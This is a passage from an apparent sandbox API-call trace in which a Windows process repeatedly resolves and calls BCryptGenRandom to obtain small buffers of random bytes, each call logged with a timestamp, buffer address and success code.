(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0194.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0194.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0337e, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a0337e) returned 0x0 [0194.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0194.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0194.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a03391, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a03391) returned 0x0 [0194.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0194.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0194.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a033a2, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a033a2) returned 0x0 [0194.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.602] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0194.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.603] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.603] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0194.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a033c5, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a033c5) returned 0x0 [0194.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.605] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.605] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0194.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0194.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0194.608] BCryptGenRandom (in: hAlgorithm=0x0, 